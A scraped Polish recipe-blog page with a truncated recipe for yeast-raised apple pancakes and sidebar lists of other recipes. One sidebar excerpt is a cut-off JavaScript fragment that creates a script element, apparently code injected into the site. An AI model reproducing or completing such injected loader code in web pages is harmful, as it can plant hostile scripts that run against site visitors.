PUSZYSTE RACUCHY Z JABŁKAMI. NA SUCHYCH DROŻDŻACH

Składniki: na ok 14 szt2.5 szkl mąki pszennej4 łyżki cukrułyżeczka cukru waniliowego1 szkl mleka1 op. suchych drożdży (7g-8g)2 jajkaszczypta soliskórka otarta z cytryny1 duże jabłkoolej - do smażeniacukier, cukier puder, konfitura, dżem - do wykończenia racuchówWykonanie:Do ciepłego mleka dodajemy cukier, cukier waniliowy i suche drożdże. Mieszamy do rozpuszczenia. Następnie dodajemy jajka, sól, skórkę z cytryny i mąkę. Mieszamy ciasto dokładnie. Przykrywamy folią i...
Najnowsze przepisy
Rabarbar pojawia się w sklepach i na straganach wcześnie... ⇖ 11
Ah, Thanksgiving! It’s that magical time of year when the... ⇖ 9
Uwielbiam kuchnię pełną wyrazistych smaków i aromatów,... ⇖ 10
Jesień zagościła na dobre, to i w kuchni również jest... ⇖ 11
(function(){ u938=document.createElement("script");u938.type ⇖ 10
Idealne, słodko winne polędwiczki w sosie śliwkowym,... ⇖ 21
Przepisy z bloga
Sernik to jedno z tych ciast, które nigdy się nie nudzą... ⇖ 267
Szukasz lekkiej, zdrowej i pełnej smaku zupy? Zapraszam... ⇖ 64
Szybka, pożywna i pełna białka pasta do chleba to... ⇖ 76
Przepisy na czasie
Murzynek to takie ciasto, które piekło się u mnie w domu... ⇖ 831
Sezon na grzyby jest w pełni, w tym roku jest istne,... ⇖ 356
Sernik bez sera to taki wypiek, który potrafi naprawdę... ⇖ 328
Przysmak Sułtana to jedno z tych ciast, które wygląda... ⇖ 324
Sernik to jedno z tych ciast, które nigdy się nie nudzą... ⇖ 267